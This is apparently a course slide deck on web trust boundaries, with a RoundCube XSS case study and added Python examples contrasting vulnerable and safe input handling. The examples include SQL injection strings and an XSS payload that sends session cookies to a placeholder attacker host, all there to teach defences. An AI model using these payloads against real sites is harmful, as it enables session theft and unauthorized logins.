Careless Delegation of Trust
Web Trust Boundaries and
Security Vulnerabilities
Haris Volos and Hidayat Teonadi
CS739 – Distributed Systems
Problem
• Web of Trust
– Web crosses many trust boundaries
• To avoid careless delegation of trust, follow these
principles:
– Be specific
• Who is in your trusted group?
• What actions do you trust them to take?
– Be careful
• Bad design example
– A server offloads work to a client it “trusts”,
but the client is either malicious or is bypassed entirely.
Starting point: Java Applets
• Hypothesis
– Applets perform computation in the client
browser on behalf of the server.
• Using a web crawler (Larbin), we searched
for Java applets.
– Besides Java chat applications, the other results
seemed uninteresting.
• Conclusion
– Applet usage is not widespread.
Web Apps & JavaScript
• Interactive Web Applications
– Main application logic resides on the server side (e.g. a Servlet)
– JavaScript is used for client-side computation
• Example: input data validation
• Robust Web Applications
– JavaScript can easily be circumvented.
• It can simply be disabled in the browser, and requests
can be crafted without it.
– Never rely solely on client-side JavaScript
validation; the server must validate the input again.
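The slide's rule, "never rely solely on client-side validation", shown as an added example (not code from the slides or from any project they mention). The server-side handler re-checks the raw request and ignores anything the client merely claims, such as a "client_validated" flag or a client-supplied price. The field names, the catalog and the sample requests are assumptions constructed for this illustration.

```python
# Added example: the server re-validates every field and trusts none of
# the client's claims. Field names and catalog are made up for the demo.
import re

CATALOG = {"book-101": 12.50, "pen-7": 1.25}   # constructed price list

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def client_side_validate(form):
    """What the browser-side JavaScript would check. Anyone can skip it,
    so its result must never be treated as a security decision."""
    return (form.get("sku") in CATALOG
            and form.get("qty", "").isdigit()
            and EMAIL_RE.match(form.get("email", "")) is not None)


def server_handle_order(request):
    """Server-side handler. It validates the raw request again and never
    reads the client-supplied 'price' or 'client_validated' fields: the
    price comes from the server's own catalog."""
    errors = []
    sku = request.get("sku")
    if sku not in CATALOG:
        errors.append("unknown sku")
    qty_raw = request.get("qty", "")
    # Whitelist: 1..999 as a plain decimal, no sign, no whitespace.
    if not re.fullmatch(r"[1-9][0-9]{0,2}", qty_raw):
        errors.append("qty must be 1..999")
    email = request.get("email", "")
    if not EMAIL_RE.match(email) or len(email) > 254:
        errors.append("bad email")
    if errors:
        return {"ok": False, "errors": errors}
    qty = int(qty_raw)
    return {"ok": True, "total": round(CATALOG[sku] * qty, 2)}


if __name__ == "__main__":
    honest = {"sku": "book-101", "qty": "2", "email": "a@b.co"}
    # Forged request: the attacker skipped the JavaScript, asserts that
    # validation happened, and supplies a price of their choosing.
    forged = {"sku": "book-101", "qty": "-5", "email": "x",
              "price": "0.01", "client_validated": "true"}
    print(server_handle_order(honest))
    print(server_handle_order(forged))
```

Running the demo shows the honest order priced from the catalog and the forged one rejected on both fields; a second forged request with valid fields but "price": "0.01" is still billed the catalog price, because the server never looks at that field.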
Security Vulnerabilities
• Prevalent, because web apps cross trust
boundaries
• A malicious user will try to exploit these boundaries
• The web app must protect itself
– Is cryptography enough? No! Encryption (e.g. TLS)
protects data in transit; a malicious client's input
still arrives intact.
– Must validate any data that crosses the trust
boundary
• Example Vulnerabilities
– Cross site scripting, SQL Injection
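One of the two example vulnerabilities from this slide, SQL injection, as an added example (not code from the slides): the same login check built once by string concatenation and once as a parameterized query, run against an in-memory SQLite table. The table, its two rows and the attack strings are constructed for the demo; passwords are stored in plaintext only to keep the example short, which is a separate weakness not discussed here.

```python
# Added example: SQL injection through a login query, vulnerable form
# beside the parameterized form. Data is constructed for the demo.
import sqlite3


def make_db():
    """In-memory users table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by string formatting: user input becomes part of the
    statement, so a quote in the input changes the statement's structure."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the values are bound separately from the
    statement text and can only ever be compared as data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


# Two classic attack strings (constructed): comment out the password
# check, or make the WHERE clause always true.
COMMENT_ATTACK = "alice' --"
TAUTOLOGY_ATTACK = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, comment attack :", login_vulnerable(db, COMMENT_ATTACK, "wrong"))
    print("vulnerable, tautology      :", login_vulnerable(db, "x", TAUTOLOGY_ATTACK))
    print("safe, comment attack       :", login_safe(db, COMMENT_ATTACK, "wrong"))
    print("safe, tautology            :", login_safe(db, "x", TAUTOLOGY_ATTACK))
```

With the vulnerable function both attacks log in without a valid password; the parameterized version returns None for both, while still accepting the genuine credentials.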
Case Study: RoundCube Webmail
• RoundCube Webmail is a browser-based IMAP client
with an Apache/PHP/MySQL backend.
• RSnake from ha.ckers.org disclosed a type-1 cross-site
scripting (XSS) vulnerability
– Type-1 (reflected) XSS: attacker-supplied input is echoed
unescaped into a server-generated dynamic page, so foreign
code runs in the victim's browser.
– Exploit scenario: the injected script silently sends the
victim's session cookies to the attacker.
• We managed to reproduce the XSS vulnerability locally.
• We realized how seemingly adequate server-side validation
can still be circumvented.
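The last point, that server-side validation which looks adequate can still be bypassed, as an added example (not RoundCube's code and not RSnake's vector, which the slides do not reproduce). A page reflects a name parameter three ways: unfiltered, through a blacklist that strips script elements, and through HTML output encoding. The payloads are generic constructed ones; the cookie-stealing shape in the first one is the scenario described on the slide.

```python
# Added example: reflected (type-1) XSS, a blacklist filter that looks
# adequate, and the output-encoding fix. Payloads are constructed.
import html
import re

# Classic cookie exfiltration via a script element (constructed payload;
# attacker.example is a placeholder host).
SCRIPT_PAYLOAD = ("<script>document.location='http://attacker.example/?c='"
                  "+document.cookie</script>")
# No script element at all: an event handler on an ordinary tag.
IMG_PAYLOAD = '<img src=x onerror="alert(document.cookie)">'


def render_greeting_vulnerable(name):
    """Reflects the request parameter straight into the page."""
    return "<p>Hello, %s</p>" % name


SCRIPT_TAG = re.compile(r"<script[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def render_greeting_blacklist(name):
    """'Seemingly adequate' validation: strips <script>...</script> blocks,
    then reflects whatever is left. It stops the obvious payload only."""
    return "<p>Hello, %s</p>" % SCRIPT_TAG.sub("", name)


def render_greeting_escaped(name):
    """Output encoding: every character that could open markup or break out
    of an attribute is encoded, so the input can only render as text."""
    return "<p>Hello, %s</p>" % html.escape(name, quote=True)


ACTIVE_MARKUP = re.compile(r"<\s*script\b|<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def contains_active_markup(page):
    """Crude detector used only by this example: a script element, or a tag
    carrying an on* event-handler attribute, in the rendered page."""
    return ACTIVE_MARKUP.search(page) is not None


if __name__ == "__main__":
    for label, fn in [("vulnerable", render_greeting_vulnerable),
                      ("blacklist", render_greeting_blacklist),
                      ("escaped", render_greeting_escaped)]:
        for payload in (SCRIPT_PAYLOAD, IMG_PAYLOAD):
            page = fn(payload)
            print("%-10s active=%-5s %s" % (label, contains_active_markup(page), page))
```

The blacklist blocks the script-element payload and passes the event-handler one untouched; only the encoded rendering is inert for both, because it changes how the data is written out rather than guessing which inputs are dangerous.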
Next Step
• Study the trust boundary more broadly
• Find more web applications
• Use a web vulnerability scanner (e.g.
Gamja) to guide the search
– Expose vulnerabilities
– Study them, and
– Propose some corrections